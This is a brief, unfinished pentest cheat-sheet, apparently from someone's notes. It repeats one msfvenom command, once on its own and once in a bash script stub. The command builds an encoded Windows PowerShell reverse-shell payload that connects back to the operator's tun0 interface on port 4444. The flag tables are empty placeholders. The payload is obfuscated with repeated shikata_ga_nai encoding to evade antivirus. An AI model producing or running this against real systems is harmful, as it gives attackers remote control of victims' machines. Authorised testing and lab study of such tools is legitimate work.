Pre-made commands
Windows Powershell reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=4444 -e x86/shikata_ga_nai -i 9 -f psh -o shell.ps1Flags
| Flag | Description |
|---|---|
| -x | What does it do |
Useful Scripts
Useful bash script
#!/bin/bashmsfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=4444 -e x86/shikata_ga_nai -i 9 -f psh -o shell.ps1| Flag | Description |
|---|---|
| -x | What does it do |
#!/bin/bash